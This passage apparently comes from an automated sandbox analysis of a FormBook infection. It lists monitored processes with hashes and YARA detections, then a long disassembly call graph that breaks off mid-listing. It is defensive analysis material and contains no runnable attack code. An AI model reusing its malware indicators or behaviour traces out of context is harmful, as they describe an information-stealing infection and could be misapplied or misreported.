                                                            Path:C:\Windows\SysWOW64\rasautou.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\rasautou.exe"
                                                            Imagebase:0x770000
                                                            File size:15'360 bytes
                                                            MD5 hash:DFDBEDC2ED47CBABC13CCC64E97868F3
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            General

                                                            Target ID:13
                                                            Start time:15:29:27
                                                            Start date:05/12/2024
                                                            Path:C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe"
                                                            Imagebase:0xbc0000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:15
                                                            Start time:15:29:40
                                                            Start date:05/12/2024
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff722870000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.4%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:8.9%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:68
                                                              execution_graph 104352 87fe27 104365 85f944 104352->104365 104354 87fe3d 104355 87fe53 104354->104355 104356 87febe 104354->104356 104454 849e5d 60 API calls 104355->104454 104374 84fce0 104356->104374 104358 87fe92 104360 88089c 104358->104360 104361 87fe9a 104358->104361 104456 8a9e4a 89 API calls 4 library calls 104360->104456 104455 8a834f 59 API calls Mailbox 104361->104455 104364 87feb2 Mailbox 104366 85f950 104365->104366 104367 85f962 104365->104367 104457 849d3c 60 API calls Mailbox 104366->104457 104368 85f991 104367->104368 104369 85f968 104367->104369 104468 849d3c 60 API calls Mailbox 104368->104468 104458 860db6 104369->104458 104373 85f95a 104373->104354 104497 848180 104374->104497 104376 84fd3d 104378 88472d 104376->104378 104423 8506f6 104376->104423 104502 84f234 104376->104502 104620 8a9e4a 89 API calls 4 library calls 104378->104620 104381 884742 104382 84fe3e 104383 88488d 104382->104383 104386 84fe4c 104382->104386 104624 8966ec 59 API calls 2 library calls 104382->104624 104383->104381 104383->104386 104626 8ba2d9 85 API calls Mailbox 104383->104626 104384 850517 104393 860db6 Mailbox 59 API calls 104384->104393 104385 860db6 59 API calls Mailbox 104415 84fdd3 104385->104415 104394 8848f9 104386->104394 104440 884b53 104386->104440 104506 84837c 104386->104506 104387 8847d7 104387->104381 104622 8a9e4a 89 API calls 4 library calls 104387->104622 104390 884848 104625 8960ef 59 API calls 2 library calls 104390->104625 104400 850545 _memmove 104393->104400 104401 884917 104394->104401 104628 8485c0 59 API calls Mailbox 104394->104628 104396 884755 104396->104387 104621 84f6a3 331 API calls 104396->104621 104408 860db6 Mailbox 59 API calls 104400->104408 104407 884928 104401->104407 104629 8485c0 59 API calls Mailbox 104401->104629 104402 84fea4 104411 84ff32 104402->104411 104412 884ad6 104402->104412 104446 850179 Mailbox _memmove 104402->104446 104403 88486b 104405 849ea0 331 API calls 104403->104405 104404 8848b2 Mailbox 104404->104386 104627 8966ec 59 API calls 2 library calls 104404->104627 104405->104383 104407->104446 104630 8960ab 59 API calls Mailbox 104407->104630 104452 850106 _memmove 104408->104452 104413 860db6 Mailbox 59 API calls 104411->104413 104639 8a9ae7 60 API calls 104412->104639 104417 84ff39 104413->104417 104415->104381 104415->104382 104415->104384 104415->104385 104415->104396 104415->104400 104428 88480c 104415->104428 104594 849ea0 104415->104594 104417->104423 104513 8509d0 104417->104513 104419 884a4d 104420 849ea0 331 API calls 104419->104420 104422 884a87 104420->104422 104422->104381 104634 8484c0 104422->104634 104619 8a9e4a 89 API calls 4 library calls 104423->104619 104425 84ffb2 104425->104400 104425->104423 104432 84ffe6 104425->104432 104623 8a9e4a 89 API calls 4 library calls 104428->104623 104430 884ab2 104638 8a9e4a 89 API calls 4 library calls 104430->104638 104438 850007 104432->104438 104640 848047 104432->104640 104437 860db6 59 API calls Mailbox 104437->104446 104438->104423 104441 884b24 104438->104441 104443 85004c 104438->104443 104439 850398 104439->104364 104440->104381 104645 8a9e4a 89 API calls 4 library calls 104440->104645 104644 849d3c 60 API calls Mailbox 104441->104644 104443->104423 104443->104440 104444 8500d8 104443->104444 104590 849d3c 60 API calls Mailbox 104444->104590 104446->104419 104446->104423 104446->104430 104446->104437 104446->104439 104447 884a1c 104446->104447 104592 848740 68 API calls __cinit 104446->104592 104593 848660 68 API calls 104446->104593 104631 8a5937 68 API calls 104446->104631 104632 8489b3 69 API calls Mailbox 104446->104632 104633 849d3c 60 API calls Mailbox 104446->104633 104450 860db6 Mailbox 59 API calls 104447->104450 104448 8500eb 104448->104423 104591 8482df 59 API calls Mailbox 104448->104591 104450->104419 104452->104446 104453 850162 104452->104453 104618 849c90 59 API calls Mailbox 104452->104618 104453->104364 104454->104358 104455->104364 104456->104364 104457->104373 104460 860dbe 104458->104460 104461 860dd8 104460->104461 104463 860ddc std::exception::exception 104460->104463 104469 86571c 104460->104469 104486 8633a1 DecodePointer 104460->104486 104461->104373 104487 86859b RaiseException 104463->104487 104465 860e06 104488 8684d1 58 API calls _free 104465->104488 104467 860e18 104467->104373 104468->104373 104470 865797 104469->104470 104478 865728 104469->104478 104495 8633a1 DecodePointer 104470->104495 104472 86579d 104496 868b28 58 API calls __getptd_noexit 104472->104496 104475 86575b RtlAllocateHeap 104476 86578f 104475->104476 104475->104478 104476->104460 104478->104475 104479 865783 104478->104479 104480 865733 104478->104480 104484 865781 104478->104484 104492 8633a1 DecodePointer 104478->104492 104493 868b28 58 API calls __getptd_noexit 104479->104493 104480->104478 104489 86a16b 58 API calls 2 library calls 104480->104489 104490 86a1c8 58 API calls 7 library calls 104480->104490 104491 86309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104480->104491 104494 868b28 58 API calls __getptd_noexit 104484->104494 104486->104460 104487->104465 104488->104467 104489->104480 104490->104480 104492->104478 104493->104484 104494->104476 104495->104472 104496->104476 104498 84818f 104497->104498 104501 8481aa 104497->104501 104646 847e4f 104498->104646 104500 848197 CharUpperBuffW 104500->104501 104501->104376 104503 84f251 104502->104503 104505 84f272 104503->104505 104650 8a9e4a 89 API calls 4 library calls 104503->104650 104505->104415 104507 84838d 104506->104507 104508 87edbd 104506->104508 104509 860db6 Mailbox 59 API calls 104507->104509 104510 848394 104509->104510 104511 8483b5 104510->104511 104651 848634 59 API calls Mailbox 104510->104651 104511->104394 104511->104402 104514 884cc3 104513->104514 104525 8509f5 104513->104525 104711 8a9e4a 89 API calls 4 library calls 104514->104711 104516 850cfa 104516->104425 104518 850ee4 104518->104516 104520 850ef1 104518->104520 104709 851093 331 API calls Mailbox 104520->104709 104521 850a4b PeekMessageW 104589 850a05 Mailbox 104521->104589 104523 850ef8 LockWindowUpdate DestroyWindow GetMessageW 104523->104516 104527 850f2a 104523->104527 104525->104589 104712 849e5d 60 API calls 104525->104712 104713 896349 331 API calls 104525->104713 104526 884e81 Sleep 104526->104589 104530 885c58 TranslateMessage DispatchMessageW GetMessageW 104527->104530 104528 850ce4 104528->104516 104708 851070 10 API calls Mailbox 104528->104708 104530->104530 104531 885c88 104530->104531 104531->104516 104532 850ea5 TranslateMessage DispatchMessageW 104533 850e43 PeekMessageW 104532->104533 104533->104589 104534 884d50 TranslateAcceleratorW 104534->104533 104534->104589 104536 850d13 timeGetTime 104536->104589 104537 88581f WaitForSingleObject 104539 88583c GetExitCodeProcess CloseHandle 104537->104539 104537->104589 104574 850f95 104539->104574 104540 850e5f Sleep 104573 850e70 Mailbox 104540->104573 104541 848047 59 API calls 104541->104589 104543 860db6 59 API calls Mailbox 104543->104589 104544 885af8 Sleep 104544->104573 104546 86049f timeGetTime 104546->104573 104547 850f4e timeGetTime 104710 849e5d 60 API calls 104547->104710 104550 885b8f GetExitCodeProcess 104552 885bbb CloseHandle 104550->104552 104553 885ba5 WaitForSingleObject 104550->104553 104552->104573 104553->104552 104553->104589 104555 84b73c 304 API calls 104555->104589 104557 8c5f25 110 API calls 104557->104573 104558 84b7dd 109 API calls 104558->104573 104559 849e5d 60 API calls 104559->104589 104560 885874 104560->104574 104561 885c17 Sleep 104561->104589 104562 885078 Sleep 104562->104589 104568 849ea0 304 API calls 104568->104589 104571 84fce0 304 API calls 104571->104589 104573->104546 104573->104550 104573->104557 104573->104558 104573->104560 104573->104561 104573->104562 104573->104574 104573->104589 104738 847667 104573->104738 104743 8a2408 60 API calls 104573->104743 104744 849e5d 60 API calls 104573->104744 104745 847de1 104573->104745 104749 8489b3 69 API calls Mailbox 104573->104749 104750 84b73c 331 API calls 104573->104750 104751 8964da 60 API calls 104573->104751 104752 8a5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104573->104752 104753 8a3c55 66 API calls Mailbox 104573->104753 104574->104425 104576 8a9e4a 89 API calls 104576->104589 104578 847de1 59 API calls 104578->104589 104579 849c90 59 API calls Mailbox 104579->104589 104580 8484c0 69 API calls 104580->104589 104582 89617e 59 API calls Mailbox 104582->104589 104583 8855d5 VariantClear 104583->104589 104584 88566b VariantClear 104584->104589 104585 848cd4 59 API calls Mailbox 104585->104589 104586 885419 VariantClear 104586->104589 104587 896e8f 59 API calls 104587->104589 104588 8489b3 69 API calls 104588->104589 104589->104521 104589->104526 104589->104528 104589->104532 104589->104533 104589->104534 104589->104536 104589->104537 104589->104540 104589->104541 104589->104543 104589->104544 104589->104547 104589->104555 104589->104559 104589->104568 104589->104571 104589->104573 104589->104574 104589->104576 104589->104578 104589->104579 104589->104580 104589->104582 104589->104583 104589->104584 104589->104585 104589->104586 104589->104587 104589->104588 104652 84e6a0 104589->104652 104683 84f460 104589->104683 104702 8431ce 104589->104702 104707 84e420 331 API calls 104589->104707 104714 8c6018 59 API calls 104589->104714 104715 8a9a15 59 API calls Mailbox 104589->104715 104716 89d4f2 59 API calls 104589->104716 104717 849837 104589->104717 104735 8960ef 59 API calls 2 library calls 104589->104735 104736 848401 59 API calls 104589->104736 104737 8482df 59 API calls Mailbox 104589->104737 104590->104448 104591->104452 104592->104446 104593->104446 104595 849ebf 104594->104595 104614 849eed Mailbox 104594->104614 104596 860db6 Mailbox 59 API calls 104595->104596 104596->104614 104597 862d40 67 API calls __cinit 104597->104614 104598 84b475 104599 848047 59 API calls 104598->104599 104613 84a057 104599->104613 104600 896e8f 59 API calls 104600->104614 104601 84b47a 104602 880055 104601->104602 104617 8809e5 104601->104617 105776 8a9e4a 89 API calls 4 library calls 104602->105776 104603 847667 59 API calls 104603->104614 104604 84a55a 105777 8a9e4a 89 API calls 4 library calls 104604->105777 104608 848047 59 API calls 104608->104614 104609 880064 104609->104415 104610 860db6 59 API calls Mailbox 104610->104614 104613->104415 104614->104597 104614->104598 104614->104600 104614->104601 104614->104602 104614->104603 104614->104604 104614->104608 104614->104610 104614->104613 104615 8809d6 104614->104615 105774 84c8c0 331 API calls 2 library calls 104614->105774 105775 84b900 60 API calls Mailbox 104614->105775 105778 8a9e4a 89 API calls 4 library calls 104615->105778 105779 8a9e4a 89 API calls 4 library calls 104617->105779 104618->104452 104619->104378 104620->104381 104621->104387 104622->104381 104623->104381 104624->104390 104625->104403 104626->104404 104627->104404 104628->104401 104629->104407 104630->104446 104631->104446 104632->104446 104633->104446 104635 8484cb 104634->104635 104637 8484f2 104635->104637 105780 8489b3 69 API calls Mailbox 104635->105780 104637->104430 104638->104381 104639->104432 104641 848052 104640->104641 104642 84805a 104640->104642 105781 847f77 59 API calls 2 library calls 104641->105781 104642->104438 104644->104440 104645->104381 104647 847e62 104646->104647 104649 847e5f _memmove 104646->104649 104648 860db6 Mailbox 59 API calls 104647->104648 104648->104649 104649->104500 104650->104505 104651->104511 104653 84e6d5 104652->104653 104654 883aa9 104653->104654 104657 84e73f 104653->104657 104659 84e799 104653->104659 104655 849ea0 331 API calls 104654->104655 104656 883abe 104655->104656 104682 84e970 Mailbox 104656->104682 104755 8a9e4a 89 API calls 4 library calls 104656->104755 104657->104659 104661 847667 59 API calls 104657->104661 104658 847667 59 API calls 104658->104659 104659->104658 104662 862d40 __cinit 67 API calls 104659->104662 104664 883b26 104659->104664 104668 84e95a 104659->104668 104659->104682 104663 883b04 104661->104663 104662->104659 104756 862d40 104663->104756 104664->104589 104666 8484c0 69 API calls 104666->104682 104667 849ea0 331 API calls 104667->104682 104668->104682 104759 8a9e4a 89 API calls 4 library calls 104668->104759 104669 8a9e4a 89 API calls 104669->104682 104671 848d40 59 API calls 104671->104682 104679 84f195 104763 8a9e4a 89 API calls 4 library calls 104679->104763 104680 883e25 104680->104589 104681 84ea78 104681->104589 104682->104666 104682->104667 104682->104669 104682->104671 104682->104679 104682->104681 104754 847f77 59 API calls 2 library calls 104682->104754 104760 896e8f 59 API calls 104682->104760 104761 8bc5c3 331 API calls 104682->104761 104762 8bb53c 331 API calls Mailbox 104682->104762 104764 849c90 59 API calls Mailbox 104682->104764 104765 8b93c6 331 API calls Mailbox 104682->104765 104684 84f650 104683->104684 104685 84f4ba 104683->104685 104688 847de1 59 API calls 104684->104688 104686 84f4c6 104685->104686 104687 88441e 104685->104687 104942 84f290 331 API calls 2 library calls 104686->104942 104944 8bbc6b 331 API calls Mailbox 104687->104944 104694 84f58c Mailbox 104688->104694 104691 88442c 104695 84f630 104691->104695 104945 8a9e4a 89 API calls 4 library calls 104691->104945 104693 84f4fd 104693->104691 104693->104694 104693->104695 104844 8b445a 104694->104844 104853 844e4a 104694->104853 104859 8a3c37 104694->104859 104862 8acb7a 104694->104862 104695->104589 104697 84f5e3 104697->104695 104943 849c90 59 API calls Mailbox 104697->104943 104703 843212 104702->104703 104705 8431e0 104702->104705 104703->104589 104704 843205 IsDialogMessageW 104704->104703 104704->104705 104705->104703 104705->104704 104706 87cf32 GetClassLongW 104705->104706 104706->104704 104706->104705 104707->104589 104708->104518 104709->104523 104710->104589 104711->104525 104712->104525 104713->104525 104714->104589 104715->104589 104716->104589 104718 849851 104717->104718 104727 84984b 104717->104727 104719 87f5d3 __i64tow 104718->104719 104720 849899 104718->104720 104721 849857 __itow 104718->104721 104725 87f4da 104718->104725 105772 863698 83 API calls 3 library calls 104720->105772 104724 860db6 Mailbox 59 API calls 104721->104724 104726 849871 104724->104726 104729 860db6 Mailbox 59 API calls 104725->104729 104733 87f552 Mailbox _wcscpy 104725->104733 104726->104727 104728 847de1 59 API calls 104726->104728 104727->104589 104728->104727 104730 87f51f 104729->104730 104731 860db6 Mailbox 59 API calls 104730->104731 104732 87f545 104731->104732 104732->104733 104734 847de1 59 API calls 104732->104734 105773 863698 83 API calls 3 library calls 104733->105773 104734->104733 104735->104589 104736->104589 104737->104589 104739 860db6 Mailbox 59 API calls 104738->104739 104740 847688 104739->104740 104741 860db6 Mailbox 59 API calls 104740->104741 104742 847696 104741->104742 104742->104573 104743->104573 104744->104573 104746 847df0 __wsetenvp _memmove 104745->104746 104747 860db6 Mailbox 59 API calls 104746->104747 104748 847e2e 104747->104748 104748->104573 104749->104573 104750->104573 104751->104573 104752->104573 104753->104573 104754->104682 104755->104682 104766 862c44 104756->104766 104758 862d4b 104758->104659 104759->104682 104760->104682 104761->104682 104762->104682 104763->104680 104764->104682 104765->104682 104767 862c50 __lseeki64 104766->104767 104774 863217 104767->104774 104773 862c77 __lseeki64 104773->104758 104791 869c0b 104774->104791 104776 862c59 104777 862c88 DecodePointer DecodePointer 104776->104777 104778 862c65 104777->104778 104779 862cb5 104777->104779 104788 862c82 104778->104788 104779->104778 104837 8687a4 59 API calls __lseeki64 104779->104837 104781 862d18 EncodePointer EncodePointer 104781->104778 104782 862cc7 104782->104781 104783 862cec 104782->104783 104838 868864 61 API calls 2 library calls 104782->104838 104783->104778 104786 862d06 EncodePointer 104783->104786 104839 868864 61 API calls 2 library calls 104783->104839 104786->104781 104787 862d00 104787->104778 104787->104786 104840 863220 104788->104840 104792 869c2f EnterCriticalSection 104791->104792 104793 869c1c 104791->104793 104792->104776 104798 869c93 104793->104798 104795 869c22 104795->104792 104822 8630b5 58 API calls 3 library calls 104795->104822 104799 869c9f __lseeki64 104798->104799 104800 869cc0 104799->104800 104801 869ca8 104799->104801 104815 869ce1 __lseeki64 104800->104815 104826 86881d 58 API calls 2 library calls 104800->104826 104823 86a16b 58 API calls 2 library calls 104801->104823 104803 869cad 104824 86a1c8 58 API calls 7 library calls 104803->104824 104806 869cd5 104808 869cdc 104806->104808 104809 869ceb 104806->104809 104807 869cb4 104825 86309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104807->104825 104827 868b28 58 API calls __getptd_noexit 104808->104827 104812 869c0b __lock 58 API calls 104809->104812 104813 869cf2 104812->104813 104816 869d17 104813->104816 104817 869cff 104813->104817 104815->104795 104829 862d55 104816->104829 104828 869e2b InitializeCriticalSectionAndSpinCount 104817->104828 104820 869d0b 104835 869d33 LeaveCriticalSection _doexit 104820->104835 104823->104803 104824->104807 104826->104806 104827->104815 104828->104820 104830 862d5e RtlFreeHeap 104829->104830 104831 862d87 _free 104829->104831 104830->104831 104832 862d73 104830->104832 104831->104820 104836 868b28 58 API calls __getptd_noexit 104832->104836 104834 862d79 GetLastError 104834->104831 104835->104815 104836->104834 104837->104782 104838->104783 104839->104787 104843 869d75 LeaveCriticalSection 104840->104843 104842 862c87 104842->104773 104843->104842 104845 849837 84 API calls 104844->104845 104846 8b4494 104845->104846 104946 846240 104846->104946 104848 8b44c9 104852 8b44cd 104848->104852 104971 849a98 59 API calls Mailbox 104848->104971 104849 8b44a4 104849->104848 104850 849ea0 331 API calls 104849->104850 104850->104848 104852->104697 104854 844e54 104853->104854 104858 844e5b 104853->104858 104988 8653a6 104854->104988 104856 844e6a 104856->104697 104857 844e7b FreeLibrary 104857->104856 104858->104856 104858->104857 105258 8a445a GetFileAttributesW 104859->105258 104863 847667 59 API calls 104862->104863 104864 8acbaf 104863->104864 104865 847667 59 API calls 104864->104865 104866 8acbb8 104865->104866 104867 8acbcc 104866->104867 105458 849b3c 59 API calls 104866->105458 104869 849837 84 API calls 104867->104869 104870 8acbe9 104869->104870 104871 8accea 104870->104871 104872 8acc0b 104870->104872 104878 8acd1a Mailbox 104870->104878 105262 844ddd 104871->105262 104873 849837 84 API calls 104872->104873 104875 8acc17 104873->104875 104879 848047 59 API calls 104875->104879 104877 8acd16 104877->104878 104881 847667 59 API calls 104877->104881 104878->104697 104882 8acc23 104879->104882 104880 844ddd 136 API calls 104880->104877 104883 8acd4b 104881->104883 104885 8acc69 104882->104885 104886 8acc37 104882->104886 104884 847667 59 API calls 104883->104884 104887 8acd54 104884->104887 104889 849837 84 API calls 104885->104889 104888 848047 59 API calls 104886->104888 104890 847667 59 API calls 104887->104890 104891 8acc47 104888->104891 104892 8acc76 104889->104892 104893 8acd5d 104890->104893 105459 847cab 104891->105459 104895 848047 59 API calls 104892->104895 104896 847667 59 API calls 104893->104896 104899 8acc82 104895->104899 104897 8acd66 104896->104897 104900 849837 84 API calls 104897->104900 105466 8a4a31 GetFileAttributesW 104899->105466 104904 8acd73 104900->104904 104901 849837 84 API calls 104905 8acc5d 104901->104905 104903 8acc8b 104906 8acc9e 104903->104906 104909 8479f2 59 API calls 104903->104909 105286 84459b 104904->105286 104908 847b2e 59 API calls 104905->104908 104911 849837 84 API calls 104906->104911 104917 8acca4 104906->104917 104908->104885 104909->104906 104910 8acd8e 105337 8479f2 104910->105337 104913 8acccb 104911->104913 105467 8a37ef 75 API calls Mailbox 104913->105467 104916 8acdd1 104919 848047 59 API calls 104916->104919 104917->104878 104918 8479f2 59 API calls 104921 8acdae 104918->104921 104920 8acddf 104919->104920 105340 847b2e 104920->105340 104921->104916 105468 847bcc 104921->105468 104925 847b2e 59 API calls 104927 8acdfb 104925->104927 104926 8acdc3 104928 847bcc 59 API calls 104926->104928 104929 847b2e 59 API calls 104927->104929 104928->104916 104930 8ace09 104929->104930 104931 849837 84 API calls 104930->104931 104932 8ace15 104931->104932 105349 8a4071 104932->105349 104934 8ace26 104935 8a3c37 3 API calls 104934->104935 104936 8ace30 104935->104936 104937 849837 84 API calls 104936->104937 104941 8ace61 104936->104941 104938 8ace4e 104937->104938 105403 8a9155 104938->105403 104940 844e4a 84 API calls 104940->104878 104941->104940 104942->104693 104943->104697 104944->104691 104945->104695 104972 847a16 104946->104972 104948 84646a 104979 84750f 59 API calls 2 library calls 104948->104979 104950 846484 Mailbox 104950->104849 104953 87dff6 104985 89f8aa 91 API calls 4 library calls 104953->104985 104954 84750f 59 API calls 104960 846265 104954->104960 104958 847d8c 59 API calls 104958->104960 104959 87e004 104986 84750f 59 API calls 2 library calls 104959->104986 104960->104948 104960->104953 104960->104954 104960->104958 104963 846799 _memmove 104960->104963 104964 87df92 104960->104964 104968 847e4f 59 API calls 104960->104968 104977 845f6c 60 API calls 104960->104977 104978 845d41 59 API calls Mailbox 104960->104978 104980 845e72 60 API calls 104960->104980 104981 847924 59 API calls 2 library calls 104960->104981 104962 87e01a 104962->104950 104987 89f8aa 91 API calls 4 library calls 104963->104987 104982 848029 104964->104982 104966 87df9d 104970 860db6 Mailbox 59 API calls 104966->104970 104969 84643b CharUpperBuffW 104968->104969 104969->104960 104970->104963 104971->104852 104973 860db6 Mailbox 59 API calls 104972->104973 104974 847a3b 104973->104974 104975 848029 59 API calls 104974->104975 104976 847a4a 104975->104976 104976->104960 104977->104960 104978->104960 104979->104950 104980->104960 104981->104960 104983 860db6 Mailbox 59 API calls 104982->104983 104984 848033 104983->104984 104984->104966 104985->104959 104986->104962 104987->104950 104989 8653b2 __lseeki64 104988->104989 104990 8653c6 104989->104990 104991 8653de 104989->104991 105023 868b28 58 API calls __getptd_noexit 104990->105023 104998 8653d6 __lseeki64 104991->104998 105001 866c11 104991->105001 104993 8653cb 105024 868db6 9 API calls __lseeki64 104993->105024 104998->104858 105002 866c43 EnterCriticalSection 105001->105002 105003 866c21 105001->105003 105005 8653f0 105002->105005 105003->105002 105004 866c29 105003->105004 105006 869c0b __lock 58 API calls 105004->105006 105007 86533a 105005->105007 105006->105005 105008 86535d 105007->105008 105009 865349 105007->105009 105016 865359 105008->105016 105026 864a3d 105008->105026 105069 868b28 58 API calls __getptd_noexit 105009->105069 105011 86534e 105070 868db6 9 API calls __lseeki64 105011->105070 105025 865415 LeaveCriticalSection LeaveCriticalSection _fseek 105016->105025 105019 865377 105043 870a02 105019->105043 105021 86537d 105021->105016 105022 862d55 _free 58 API calls 105021->105022 105022->105016 105023->104993 105024->104998 105025->104998 105027 864a50 105026->105027 105028 864a74 105026->105028 105027->105028 105029 8646e6 __flush 58 API calls 105027->105029 105032 870b77 105028->105032 105030 864a6d 105029->105030 105071 86d886 105030->105071 105033 870b84 105032->105033 105035 865371 105032->105035 105034 862d55 _free 58 API calls 105033->105034 105033->105035 105034->105035 105036 8646e6 105035->105036 105037 864705 105036->105037 105038 8646f0 105036->105038 105037->105019 105213 868b28 58 API calls __getptd_noexit 105038->105213 105040 8646f5 105214 868db6 9 API calls __lseeki64 105040->105214 105042 864700 105042->105019 105044 870a0e __lseeki64 105043->105044 105045 870a32 105044->105045 105046 870a1b 105044->105046 105047 870abd 105045->105047 105049 870a42 105045->105049 105230 868af4 58 API calls __getptd_noexit 105046->105230 105235 868af4 58 API calls __getptd_noexit 105047->105235 105052 870a60 105049->105052 105053 870a6a 105049->105053 105051 870a20 105231 868b28 58 API calls __getptd_noexit 105051->105231 105232 868af4 58 API calls __getptd_noexit 105052->105232 105057 86d206 ___lock_fhandle 59 API calls 105053->105057 105054 870a65 105236 868b28 58 API calls __getptd_noexit 105054->105236 105059 870a70 105057->105059 105061 870a83 105059->105061 105062 870a8e 105059->105062 105060 870ac9 105237 868db6 9 API calls __lseeki64 105060->105237 105215 870add 105061->105215 105233 868b28 58 API calls __getptd_noexit 105062->105233 105065 870a27 __lseeki64 105065->105021 105067 870a89 105234 870ab5 LeaveCriticalSection __unlock_fhandle 105067->105234 105069->105011 105070->105016 105072 86d892 __lseeki64 105071->105072 105073 86d8b6 105072->105073 105074 86d89f 105072->105074 105076 86d955 105073->105076 105079 86d8ca 105073->105079 105172 868af4 58 API calls __getptd_noexit 105074->105172 105178 868af4 58 API calls __getptd_noexit 105076->105178 105078 86d8a4 105173 868b28 58 API calls __getptd_noexit 105078->105173 105082 86d8f2 105079->105082 105083 86d8e8 105079->105083 105080 86d8ed 105179 868b28 58 API calls __getptd_noexit 105080->105179 105099 86d206 105082->105099 105174 868af4 58 API calls __getptd_noexit 105083->105174 105087 86d8f8 105089 86d91e 105087->105089 105090 86d90b 105087->105090 105088 86d961 105180 868db6 9 API calls __lseeki64 105088->105180 105175 868b28 58 API calls __getptd_noexit 105089->105175 105108 86d975 105090->105108 105094 86d8ab __lseeki64 105094->105028 105095 86d917 105177 86d94d LeaveCriticalSection __unlock_fhandle 105095->105177 105096 86d923 105176 868af4 58 API calls __getptd_noexit 105096->105176 105100 86d212 __lseeki64 105099->105100 105101 86d261 EnterCriticalSection 105100->105101 105103 869c0b __lock 58 API calls 105100->105103 105102 86d287 __lseeki64 105101->105102 105102->105087 105104 86d237 105103->105104 105105 86d24f 105104->105105 105181 869e2b InitializeCriticalSectionAndSpinCount 105104->105181 105182 86d28b LeaveCriticalSection _doexit 105105->105182 105109 86d982 __ftell_nolock 105108->105109 105110 86d9e0 105109->105110 105111 86d9c1 105109->105111 105142 86d9b6 105109->105142 105116 86da38 105110->105116 105117 86da1c 105110->105117 105192 868af4 58 API calls __getptd_noexit 105111->105192 105114 86e1d6 105114->105095 105115 86d9c6 105193 868b28 58 API calls __getptd_noexit 105115->105193 105119 86da51 105116->105119 105198 8718c1 60 API calls 3 library calls 105116->105198 105195 868af4 58 API calls __getptd_noexit 105117->105195 105183 875c6b 105119->105183 105121 86da21 105196 868b28 58 API calls __getptd_noexit 105121->105196 105122 86d9cd 105194 868db6 9 API calls __lseeki64 105122->105194 105127 86da5f 105129 86ddb8 105127->105129 105199 8699ac 58 API calls 2 library calls 105127->105199 105128 86da28 105197 868db6 9 API calls __lseeki64 105128->105197 105130 86ddd6 105129->105130 105131 86e14b WriteFile 105129->105131 105133 86defa 105130->105133 105140 86ddec 105130->105140 105134 86ddab GetLastError 105131->105134 105144 86dd78 105131->105144 105145 86dfef 105133->105145 105147 86df05 105133->105147 105134->105144 105136 86da8b GetConsoleMode 105136->105129 105138 86daca 105136->105138 105137 86e184 105137->105142 105204 868b28 58 API calls __getptd_noexit 105137->105204 105138->105129 105139 86dada GetConsoleCP 105138->105139 105139->105137 105167 86db09 105139->105167 105140->105137 105141 86de5b WriteFile 105140->105141 105141->105134 105146 86de98 105141->105146 105206 86c5f6 105142->105206 105144->105137 105144->105142 105149 86ded8 105144->105149 105145->105137 105150 86e064 WideCharToMultiByte 105145->105150 105146->105140 105151 86debc 105146->105151 105147->105137 105152 86df6a WriteFile 105147->105152 105148 86e1b2 105205 868af4 58 API calls __getptd_noexit 105148->105205 105154 86dee3 105149->105154 105155 86e17b 105149->105155 105150->105134 105165 86e0ab 105150->105165 105151->105144 105152->105134 105158 86dfb9 105152->105158 105201 868b28 58 API calls __getptd_noexit 105154->105201 105203 868b07 58 API calls 2 library calls 105155->105203 105158->105144 105158->105147 105158->105151 105159 86dee8 105202 868af4 58 API calls __getptd_noexit 105159->105202 105160 86e0b3 WriteFile 105163 86e106 GetLastError 105160->105163 105160->105165 105163->105165 105164 8762ba 60 API calls __write_nolock 105164->105167 105165->105144 105165->105145 105165->105151 105165->105160 105166 877a5e WriteConsoleW CreateFileW __putwch_nolock 105170 86dc5f 105166->105170 105167->105144 105167->105164 105168 86dbf2 WideCharToMultiByte 105167->105168 105167->105170 105200 8635f5 58 API calls __isleadbyte_l 105167->105200 105168->105144 105169 86dc2d WriteFile 105168->105169 105169->105134 105169->105170 105170->105134 105170->105144 105170->105166 105170->105167 105171 86dc87 WriteFile 105170->105171 105171->105134 105171->105170 105172->105078 105173->105094 105174->105080 105175->105096 105176->105095 105177->105094 105178->105080 105179->105088 105180->105094 105181->105105 105182->105101 105184 875c76 105183->105184 105185 875c83 105183->105185 105186 868b28 __lseeki64 58 API calls 105184->105186 105188 875c8f 105185->105188 105189 868b28 